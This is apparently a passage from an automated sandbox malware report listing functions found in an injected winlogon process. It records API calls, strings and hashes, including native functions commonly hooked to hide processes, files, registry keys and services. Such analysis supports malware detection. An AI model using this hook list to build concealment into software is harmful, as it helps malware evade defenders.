RtlLookupFunctionEntry.NTDLL ref: 000001881F88B59D
RtlVirtualUnwind.NTDLL ref: 000001881F88B5D8
IsDebuggerPresent.KERNEL32 ref: 000001881F88B611
SetUnhandledExceptionFilter.KERNEL32 ref: 000001881F88B61B
UnhandledExceptionFilter.KERNEL32 ref: 000001881F88B626

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: d5cc192a1e27387aa519fec5b958c6429a501f933057fa1a14e4f7980771a17f
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: EB317F32214F808ADB70CF25E844BDE73A4F798754F944126EA9D43BA5DF38C656CB00

Function 000001881F88FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 000001881F88FF67
WriteFile.KERNEL32 ref: 000001881F89021E
WriteFile.KERNEL32 ref: 000001881F890270
GetLastError.KERNEL32 ref: 000001881F890372
GetLastError.KERNEL32 ref: 000001881F8903D2

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: d0ce75ff04adc5841476422c1f5194a4d4a92f201fdd0546e9a02223b7014aac
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 87E1CDB2B14A809EE720CB74D488ADD7BB1F395788F948116DE4E57B99DE38C61BC700

Function 000001881F8812C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001881F881326
GetProcessHeap.KERNEL32 ref: 000001881F881334
HeapAlloc.KERNEL32 ref: 000001881F881345
RegEnumValueW.ADVAPI32 ref: 000001881F8813A1

Part of subcall function 000001881F881554: StrCmpIW.SHLWAPI ref: 000001881F881585

GetProcessHeap.KERNEL32 ref: 000001881F8813E9
HeapAlloc.KERNEL32 ref: 000001881F8813F7
GetProcessHeap.KERNEL32 ref: 000001881F88141B
HeapFree.KERNEL32 ref: 000001881F881429
lstrlenW.KERNEL32 ref: 000001881F881432
GetProcessHeap.KERNEL32 ref: 000001881F881440
HeapAlloc.KERNEL32 ref: 000001881F88144E
StrCpyW.SHLWAPI ref: 000001881F881470
GetProcessHeap.KERNEL32 ref: 000001881F881485
HeapFree.KERNEL32 ref: 000001881F881493

Strings

d, xrefs: 000001881F881365

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: 2625866425c61ff6427d7bd0015e33d88497fd5c99bba4fda4a0b5e05e96ec67
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: 7F516EB2214B449BEB24CF62E548BDAB3A5F7D8B84F848125EB4907B24DF3CC656C740

Function 000001881F881EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 000001881F881EBF

Part of subcall function 000001881F882174: GetModuleHandleA.KERNEL32 ref: 000001881F88218C
Part of subcall function 000001881F882174: GetProcAddress.KERNEL32 ref: 000001881F88219D

Part of subcall function 000001881F885C10: GetCurrentThreadId.KERNEL32 ref: 000001881F885C4B

Strings

NtEnumerateValueKey, xrefs: 000001881F881F76
NtQueryDirectoryFile, xrefs: 000001881F881F1F
NtQueryDirectoryFileEx, xrefs: 000001881F881F3C
ntdll.dll, xrefs: 000001881F881ECD
NtQuerySystemInformation, xrefs: 000001881F881EE5
EnumServicesStatusExW, xrefs: 000001881F881FB1, 000001881F881FD2
EnumServiceGroupW, xrefs: 000001881F881F90
NtDeviceIoControlFile, xrefs: 000001881F881FF6
NtResumeThread, xrefs: 000001881F881F02
NtEnumerateKey, xrefs: 000001881F881F59
advapi32.dll, xrefs: 000001881F881F97, 000001881F881FB8
sechost.dll, xrefs: 000001881F881FD9

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 5fb953c0bf09414c436c99547ffeca15d71b14c135fa765560e7cfcfd695d878
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: AD31D3B421094AADFF34EFA4E89EED46721B7F4348FD0D4139819521A69E38874FC390

Function 000001881F8823F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 000001881F882405
GetCurrentProcessId.KERNEL32 ref: 000001881F88240F

Part of subcall function 000001881F8819AC: OpenProcess.KERNEL32 ref: 000001881F8819CA
Part of subcall function 000001881F8819AC: IsWow64Process.KERNEL32 ref: 000001881F8819E0
Part of subcall function 000001881F8819AC: CloseHandle.KERNEL32 ref: 000001881F8819FB

CreateFileW.KERNEL32 ref: 000001881F882468
WriteFile.KERNEL32 ref: 000001881F882490
ReadFile.KERNEL32 ref: 000001881F8824AF
CloseHandle.KERNEL32 ref: 000001881F8824B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 000001881F88243F
\\.\pipe\dialerchildproc64, xrefs: 000001881F882438

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 0c09afadb083299b68e36a25b1da3d77b2433a468ef9d106f37f011f0a2a0eca
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 34214175614B4087FB20DB25E54879977A4F3D9BA4F909215EA5903BA8DF3CC64ACB00

Function 000001881F88104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 000001881F8810AB
RegEnumValueW.ADVAPI32 ref: 000001881F88110E
GetProcessHeap.KERNEL32 ref: 000001881F881155
HeapAlloc.KERNEL32 ref: 000001881F881163
GetProcessHeap.KERNEL32 ref: 000001881F881187
HeapFree.KERNEL32 ref: 000001881F881195

Strings

d, xrefs: 000001881F8810CE

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: 196513ab78f712f48a6c36dbde81f4d6f0c0dc2c538b639950c7bc49f2e2bdad
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: AF418277214B80DBE7608F51E548BDAB7A5F398B88F408125EB8947B54DF38D665CB00

Function 000001881F8B69F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001881F8B6A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001881F8B6A6A
_RTC_Initialize.LIBCMT ref: 000001881F8B6A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001881F8B6ABE
__scrt_release_startup_lock.LIBCMT ref: 000001881F8B6AE9

Memory Dump Source

Source File: 00000018.00000002.3734450076.000001881F8B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001881F8B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f8b0000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 3f04d42c2e03102e1374090ab17058333f4e76091d737dea9e8ab80bddfe2510
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: C081E6B16006898EFB70AB25945DFD966E0F776788FC8C0659A09537D6DF38CB478300

Function 000001881F8875F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001881F887618
__scrt_acquire_startup_lock.LIBCMT ref: 000001881F88766A
_RTC_Initialize.LIBCMT ref: 000001881F887698
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001881F8876BE
__scrt_release_startup_lock.LIBCMT ref: 000001881F8876E9

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: ad86631859bf5d870ddac55933a2b68ffc0bbf849ca65ffee51550d10c9dd0b8
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 7481AD717042418EFB70BB299849BED26F1BBB5B80FD8C0159A4987796DE38CB63C714

Function 000001881F8569F0 Relevance: 12.2, APIs: 8, Instructions: 230COMMON

Download Yara Rule

APIs

__scrt_dllmain_crt_thread_attach.LIBCMT ref: 000001881F856A18
__scrt_acquire_startup_lock.LIBCMT ref: 000001881F856A6A
_RTC_Initialize.LIBCMT ref: 000001881F856A98
__scrt_dllmain_after_initialize_c.LIBCMT ref: 000001881F856ABE
__scrt_release_startup_lock.LIBCMT ref: 000001881F856AE9

Memory Dump Source

Source File: 00000018.00000002.3733356140.000001881F850000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f850000_winlogon.jbxd

Similarity

API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
String ID:
API String ID: 190073905-0
Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction ID: 6dc9c21a538b9f69875b9bf4d32f4a1c2b91a84ab52010c657143b8bdf96ebca
Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
Instruction Fuzzy Hash: 3881B1B1B006858FFB70AB65B849FD962A0E775798FC4C025AA17577B6DE38CB478300

Function 000001881F889804 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32 ref: 000001881F889889
GetLastError.KERNEL32 ref: 000001881F889897
LoadLibraryExW.KERNEL32 ref: 000001881F8898C1
FreeLibrary.KERNEL32 ref: 000001881F889907
GetProcAddress.KERNEL32 ref: 000001881F889913

Strings

api-ms-, xrefs: 000001881F8898A9

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction ID: 49d4d10cac8a75c26803b1f26a8390a25e9cf1fad0f6167abe2abca639921ae3
Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
Instruction Fuzzy Hash: 3131A53131279199EE319B16A808BD96394B768FA4F998525ED2E47794DF38C647C300

Function 000001881F891B9C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 000001881F891BCD
GetLastError.KERNEL32 ref: 000001881F891BD9
CloseHandle.KERNEL32 ref: 000001881F891BF1
CreateFileW.KERNEL32 ref: 000001881F891C1C
WriteConsoleW.KERNEL32 ref: 000001881F891C3B

Strings

CONOUT$, xrefs: 000001881F891BFD

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction ID: 2d2c1f74e58d8beefd8918829d4cc6e6217932a2329ff3186bca47fe7a4137b0
Opcode Fuzzy Hash: fbbfc3741cb00c8850d54b7fda61e687de032808d93317950d0633c9a62c2227
Instruction Fuzzy Hash: 3611B272314B408AE7609B02E85CB5973A4F3E8FE4F808214EA5D877A4DF38CA158744

Function 000001881F8830B4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000001881F8830D7
HeapAlloc.KERNEL32 ref: 000001881F8830EA
StrCmpNIW.SHLWAPI ref: 000001881F88316B
GetProcessHeap.KERNEL32 ref: 000001881F8831D1
HeapFree.KERNEL32 ref: 000001881F8831DF

Strings

dialer, xrefs: 000001881F883164

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID: dialer
API String ID: 756756679-3528709123
Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction ID: 5d7a6abfd1196f3fd4a5eee35b5868e89e756172d7c4a3dcdbafce8aed369a1b
Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
Instruction Fuzzy Hash: 2231B935701B519AEB75DF569848BE967A4FB64F84F84C024AF4907B64EF38C663C700

Function 000001881F881A14 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000001881F881A3A
K32GetModuleFileNameExW.KERNEL32 ref: 000001881F881A58
PathFindFileNameW.SHLWAPI ref: 000001881F881A67
lstrlenW.KERNEL32 ref: 000001881F881A73
StrCpyW.SHLWAPI ref: 000001881F881A86
CloseHandle.KERNEL32 ref: 000001881F881A94

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
String ID:
API String ID: 517849248-0
Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction ID: b4f683b2ca9b902eda9cea0462a0eb6fc2ed986b2719075659ef77a4579df02b
Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
Instruction Fuzzy Hash: D3014071300A419AEB24DB52E45CB9963A5F798FC0F888435DE9D43764DF3CCA86C740

Function 000001881F8837AC Relevance: 9.0, APIs: 6, Instructions: 39threadCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 000001881F8837C8
GetCurrentProcess.KERNEL32 ref: 000001881F8837D6
VirtualProtectEx.KERNEL32 ref: 000001881F8837F8
GetCurrentProcess.KERNEL32 ref: 000001881F883819
VirtualProtectEx.KERNEL32 ref: 000001881F88383A
TerminateThread.KERNEL32 ref: 000001881F883849

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
String ID:
API String ID: 449555515-0
Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction ID: d486a5822187ba60bb2e4718c6b6878eb199d263cc6cc9df420c4254a587f882
Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
Instruction Fuzzy Hash: D41100B5711740CAFF349B21E80DB9667A4BBA8B85F848425DD4D477A4EF3DC60AC710

Function 000001881F8890D8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001881F889103
_IsNonwritableInCurrentImage.LIBCMT ref: 000001881F889198
RtlUnwindEx.NTDLL ref: 000001881F8891E7

Strings

csm, xrefs: 000001881F88917E
f, xrefs: 000001881F889116

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction ID: a25ec71ccacf5ea1c05ff13fd4801fd65c72747ed337bed6f684d55ca9771925
Opcode Fuzzy Hash: 2b68ddb093160c159f3838c1131a2f908320feabf111407c5e8bfe37d954b0ed
Instruction Fuzzy Hash: FC518C362156008EEB64CB15E84CFD93795F3A4FA8F91C124DA6B47788EF35DA42C700

Function 000001881F881AB8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON

Download Yara Rule

APIs

GetFinalPathNameByHandleW.KERNEL32 ref: 000001881F881AD8
StrCmpNIW.SHLWAPI ref: 000001881F881AF2
lstrlenW.KERNEL32 ref: 000001881F881B01
StrCpyW.SHLWAPI ref: 000001881F881B16

Strings

\\?\, xrefs: 000001881F881AE6

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: FinalHandleNamePathlstrlen
String ID: \\?\
API String ID: 2719912262-4282027825
Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction ID: 9ebae81b654dfdf47767e3de8bc1cb324744f7f8bc47492e3634682a0901a281
Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
Instruction Fuzzy Hash: 87F04F72304A419AEB708B61F498B996764F7A4B88FC4D025DA4946958DE3CCB8ACB00

Function 000001881F883200 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

StrCmpIW.SHLWAPI ref: 000001881F883222
StrCpyW.SHLWAPI ref: 000001881F883232
StrCatW.SHLWAPI ref: 000001881F88323E
PathCombineW.SHLWAPI ref: 000001881F88324C

Strings

\\.\pipe\, xrefs: 000001881F883218

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CombinePath
String ID: \\.\pipe\
API String ID: 3422762182-91387939
Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction ID: f3bbcda533abbc3aa9579b30be3fc4cae0f865473c5c444ee91dae3bdc419358
Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
Instruction Fuzzy Hash: 2AF08270304B8096EA208B53B909599A264BB98FD1F88D131DE5A07B68CF3CC643C300

Function 000001881F88A138 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 000001881F88A154
GetProcAddress.KERNEL32 ref: 000001881F88A16A
FreeLibrary.KERNEL32 ref: 000001881F88A187

Strings

CorExitProcess, xrefs: 000001881F88A163
mscoree.dll, xrefs: 000001881F88A14B

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction ID: a62ce046835126afd96da66814c50f92ea6b6cf1c0137dcfb841ca91154f3c38
Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
Instruction Fuzzy Hash: DFF082B1311740AAEF744F60E88CBE46764BBE8B80FC4A019950B455A4CF38C68AC700

Function 000001881F890860 Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 000001881F8908A2
GetConsoleMode.KERNEL32 ref: 000001881F890960
GetLastError.KERNEL32 ref: 000001881F8909EA

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
String ID:
API String ID: 2210144848-0
Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction ID: 6f8a22b07e4fe26ab0a02f57ece65c2161f18275855dfdf3fc73f0a64879e900
Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
Instruction Fuzzy Hash: D3818BB27106508DFB70ABB59849BED26A1F7E4B98FC48116DE0E677A2DF348643C310

Function 000001881F8857F0 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 000001881F885806

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction ID: af267ea4916d6632ec43e8bd48455f4a899aa461c6cdb47e50e103b52154bdcf
Opcode Fuzzy Hash: 9102385cd68f4d9137ef911baf5828c15806a251eaacc3be75e48e98500da15d
Instruction Fuzzy Hash: E4610D32619B40CAE7709B15E45879AB7E0F3D8754F908116EA8D47BA8CF3CC652CF14

Function 000001881F8C12B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001881F8C12E0
_set_statfp.LIBCMT ref: 000001881F8C12FB
_set_statfp.LIBCMT ref: 000001881F8C1317
_set_statfp.LIBCMT ref: 000001881F8C1353

Memory Dump Source

Source File: 00000018.00000002.3734450076.000001881F8B0000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001881F8B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f8b0000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: 3563ca8ddca8feff0d1f2e7ac6caed70493b0f0e4cfbc0eea1e8cdf7ac7b3c81
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 75117C32A54E014DF6B41379E5DEBE91441AB76378FC8C625EA7A07BDA8E3C8E435300

Function 000001881F891EB8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001881F891EE0
_set_statfp.LIBCMT ref: 000001881F891EFB
_set_statfp.LIBCMT ref: 000001881F891F17
_set_statfp.LIBCMT ref: 000001881F891F53

Memory Dump Source

Source File: 00000018.00000002.3733841015.000001881F880000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F880000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f880000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: f2129004451cd454618fbae489f447ddddec3675dd18ac0b29bd250d7b66c244
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: D71173B2A5CE0509FAB81364E49EBE910417BF4374FC4C62CAA77167D68F748E434300

Function 000001881F8612B8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 000001881F8612E0
_set_statfp.LIBCMT ref: 000001881F8612FB
_set_statfp.LIBCMT ref: 000001881F861317
_set_statfp.LIBCMT ref: 000001881F861353

Memory Dump Source

Source File: 00000018.00000002.3733356140.000001881F850000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001881F850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_1881f850000_winlogon.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction ID: e062ef1f37c06891ad64b8bfd1f4ce224285e5df5f4357c37cb3d6959a3cc50e
Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
Instruction Fuzzy Hash: 80117032A54E0109F6B41369F69EBE930616B74F74FC8C625AA7746BDB8E3C8E434300

Function 000001881F8B84F5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 000001881F8B8503
_IsNonwritableInCurrentImage.LIBCMT ref: 000001881F8B8598

Strings

csm, xrefs: 000001881F8B857E
f, xrefs: 000001881F8B8516

Memory Dump Source

